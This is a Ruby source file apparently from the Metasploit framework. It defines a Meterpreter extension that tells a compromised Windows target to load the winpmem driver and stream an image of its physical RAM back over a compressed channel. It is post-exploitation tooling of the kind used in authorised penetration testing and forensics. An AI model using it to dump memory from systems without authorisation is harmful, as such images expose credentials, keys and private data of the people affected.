# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/winpmem/tlv'
require 'rex/post/meterpreter/extensions/winpmem/command_ids'
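module Rex
module Post
module Meterpreter
module Extensions
module Winpmem

###
#
# This meterpreter extension can be used to capture remote RAM (a physical
# memory image of the target, acquired through the winpmem driver).
#
###
class Winpmem < Extension

  # Status codes the remote side reports in TLV_TYPE_WINPMEM_ERROR_CODE.
  WINPMEM_ERROR_SUCCESS = 0
  WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1
  WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2
  WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3
  WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
  WINPMEM_ERROR_UNKNOWN = 255

  # Numeric identifier of this extension (defined in command_ids).
  #
  # @return [Integer]
  def self.extension_id
    EXTENSION_ID_WINPMEM
  end

  # Creates the extension and registers it on the client under the
  # alias 'winpmem'.
  #
  # @param client [Object] the meterpreter client this extension belongs to
  def initialize(client)
    super(client, 'winpmem')

    client.register_extension_aliases(
      [
        {
          'name' => 'winpmem',
          'ext' => self
        }
      ]
    )
  end

  # Asks the remote side to start a RAM capture.
  #
  # The image is not carried in the response; it is streamed over a
  # synchronous, compressed pool channel that this method opens and hands
  # back. Nothing here reads from or closes that channel.
  #
  # @return [Array] a triple of memory_size, response_code, channel. When
  #   the remote side reports anything other than WINPMEM_ERROR_SUCCESS
  #   (including a missing code) the triple is [0, response_code, nil] so
  #   the caller can inspect the code.
  # @raise [RuntimeError] when the response reports success but carries no
  #   channel identifier
  def dump_ram
    request = Packet.create_request(COMMAND_ID_WINPMEM_DUMP_RAM)
    response = client.send_request(request)
    response_code = response.get_tlv_value(TLV_TYPE_WINPMEM_ERROR_CODE)

    # A failure is reported back through the return value, not raised.
    return 0, response_code, nil unless response_code == WINPMEM_ERROR_SUCCESS

    memory_size = response.get_tlv_value(TLV_TYPE_WINPMEM_MEMORY_SIZE)
    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)

    # Raise a StandardError (RuntimeError) rather than a bare Exception so
    # that ordinary `rescue` clauses in callers can handle it; `rescue
    # Exception` callers still see it.
    raise 'We did not get a channel back!' if channel_id.nil?

    # Open the compressed Channel
    channel = Rex::Post::Meterpreter::Channels::Pool.new(
      client, channel_id, 'winpmem',
      CHANNEL_FLAG_SYNCHRONOUS | CHANNEL_FLAG_COMPRESS, response
    )

    return memory_size, response_code, channel
  end
end

end; end; end; end; end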